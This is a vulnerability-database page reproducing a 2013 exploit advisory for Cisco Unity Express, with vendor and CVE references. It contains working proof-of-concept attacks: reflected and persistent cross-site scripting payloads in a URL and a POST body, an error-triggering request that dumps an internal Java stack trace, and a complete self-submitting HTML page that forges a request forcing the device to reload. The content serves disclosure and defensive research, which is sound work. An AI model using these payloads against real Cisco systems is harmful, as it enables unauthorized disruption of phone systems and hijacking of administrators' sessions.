Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJacob HolcombPACKETSTORM:120068
HistoryFeb 05, 2013 - 12:00 a.m.

Cisco Unity Express Cross Site Request Forgery / Cross Site Scripting

2013-02-0500:00:00
Jacob Holcomb
packetstormsecurity.com
19

0.001 Low

EPSS

Percentile

44.3%

JSON
`# Exploit Title: Cisco Unity Express Multiple Vulnerabilities  
# Reported: December 2012  
# Disclosed: February 2013  
# Author: Jacob Holcomb of Independent Security Evaluators  
# CVE: XSS - CVE-2013-1114 and CSRF - CVE-2013-1120  
# http://infosec42.blogspot.com/2013/02/cisco-unity-express-vulnerabilites.html  
  
Cisco Advisory  
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1114  
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1120  
  
Proof of Concept  
XSS - CVE-2013-1114:  
GET:  
Reflective XSS & Info disclosure  
http://X.X.X.X/Web/SA2/ScriptList.do?gui_pagenotableData=><script>alert(42)</script>  
  
Information Disclosure  
Location: /Web/WEB-INF/screens/main.jsp  
Error Location: /Web/WEB-INF/screens/prompts/ListScripts.jsp  
Internal Servlet Error:  
  
javax.servlet.ServletException: invalid character at position 1 in >  
org.apache.jasper.runtime.PageContextImpl.handlePageException (Unknown Source)  
WEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:2245)  
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)  
org.apache.tomcat.core.Handler.invoke (Unknown Source)  
org.apache.tomcat.core.Handler.service (Unknown Source)  
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)  
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)  
java.security.AccessController.doPrivileged (AccessController.java:273)  
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source)  
org.apache.jasper.runtime.PageContextImpl.include (Unknown Source)  
WEB_0002dINF.screens.main._jspService (main.java:396)  
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)  
org.apache.tomcat.core.Handler.invoke (Unknown Source)  
org.apache.tomcat.core.Handler.service (Unknown Source)  
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)  
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)  
java.security.AccessController.doPrivileged (AccessController.java:273)  
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source)  
org.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759)  
org.apache.struts.action.ActionServlet.process (ActionServlet.java:1596)  
com.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157)  
org.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)  
org.apache.tomcat.core.Handler.invoke (Unknown Source)  
org.apache.tomcat.core.Handler.service (Unknown Source)  
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)  
org.apache.tomcat.core.ContextManager.internalService (Unknown Source)  
org.apache.tomcat.core.ContextManager.service (Unknown Source)  
org.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source)  
org.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source)  
org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source)  
java.lang.Thread.run (Thread.java:777)  
  
Root cause:  
java.lang.NumberFormatException: invalid character at position 1 in >  
java.lang.Throwable. (Throwable.java:166)  
java.lang.Integer.parseInt (Integer.java:775)  
java.lang.Integer.parseInt (Integer.java:262)  
com.cisco.aesop.gui.taglibs.PagingTableTag.doAfterBody (PagingTableTag.java:274)  
WEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:1903)  
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)  
org.apache.tomcat.core.Handler.invoke (Unknown Source)  
org.apache.tomcat.core.Handler.service (Unknown Source)  
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)  
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)  
java.security.AccessController.doPrivileged (AccessController.java:273)  
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source)  
org.apache.jasper.runtime.PageContextImpl.include (Unknown Source)  
WEB_0002dINF.screens.main._jspService (main.java:396)  
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)  
org.apache.tomcat.core.Handler.invoke (Unknown Source)  
org.apache.tomcat.core.Handler.service (Unknown Source)  
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)  
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)  
java.security.AccessController.doPrivileged (AccessController.java:273)  
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source)  
org.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759)  
org.apache.struts.action.ActionServlet.process (ActionServlet.java:1596)  
com.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157)  
org.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)  
org.apache.tomcat.core.Handler.invoke (Unknown Source)  
org.apache.tomcat.core.Handler.service (Unknown Source)  
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)  
org.apache.tomcat.core.ContextManager.internalService (Unknown Source)  
org.apache.tomcat.core.ContextManager.service (Unknown Source)  
org.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source)  
org.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source)  
org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source)  
java.lang.Thread.run (Thread.java:777)  
  
  
  
POST:  
Persistent XSS  
http://X.X.X.X/Web/SA3/AddHoliday.do  
POST Data: holiday.description=><script>alert(42)</script>&submitType=ADD  
  
  
CSRF - CVE-2013-1120:  
  
<html>  
<!-- # Exploit Title: Cisco Unity Express CSRF  
# Date: Discovered and reported December 2012  
# Disclosed: February 2013  
# Author: Jacob Holcomb of Independent Security Evaluators  
# Software: Cisco Unity Express  
# CVE : CVE-2013-1120 for the CSRF  
# Note: All the HTML forms are susceptible to forgery -->  
  
<head>  
<title>Reload Cisco Unity Express CSRF</title>  
</head>  
  
<body>  
  
<form name="CUEreload" action="http://X.X.X.X/Web/SA/SaveConfiguration.do" method="post">  
<input type="hidden" name="submitType" value="RELOAD"/>  
</form>  
  
<script>  
document.CUEreload.submit();  
</script>  
  
</body>  
</html>  
  
  
`

Related

zdt 1
seebug 1
openvas 2
exploitpack 1
exploitdb 1
cvelist 2
prion 2
cisco 2
cve 2
nvd 2
zdt
zdt
Cisco Unity Express Multiple Vulnerabilities
2013-02-05 00:00:00
seebug
seebug
Cisco Unity Express Multiple Vulnerabilities
2014-07-01 00:00:00
openvas
openvas
Cisco Unity Express Multiple XSS and CSRF Vulnerabilities (Cisco-SA-20130201-CVE-2013-1114, Cisco-SA-20130201-CVE-2013-1120) - Active Check
2013-02-06 00:00:00
Cisco Unity Express Multiple XSS and CSRF Vulnerabilities
2013-02-06 00:00:00
exploitpack
exploitpack
Cisco Unity Express - Multiple Vulnerabilities
2013-02-05 00:00:00
exploitdb
exploitdb
Cisco Unity Express - Multiple Vulnerabilities
2013-02-05 00:00:00
cvelist
cvelist
CVE-2013-1114
2022-10-03 16:14:49
CVE-2013-1120
2022-10-03 16:14:48
prion
prion
Cross site scripting
2013-02-13 23:55:00
Cross site request forgery (csrf)
2013-02-06 12:05:00
cisco
cisco
Cisco Unity Express Cross-Site Scripting Vulnerabilities
2013-02-01 20:04:18
Cisco Unity Express Multiple Cross-Site Request Forgery Vulnerabilities
2013-02-01 20:03:43
cve
cve
CVE-2013-1114
2022-10-03 16:14:49
CVE-2013-1120
2022-10-03 16:14:48
nvd
nvd
CVE-2013-1114
2013-02-13 23:55:01
CVE-2013-1120
2013-02-06 12:05:43

0.001 Low

EPSS

Percentile

44.3%

JSON
Related for PACKETSTORM:120068
zdt1seebug1openvas2exploitpack1exploitdb1cvelist2prion2cisco2cve2nvd2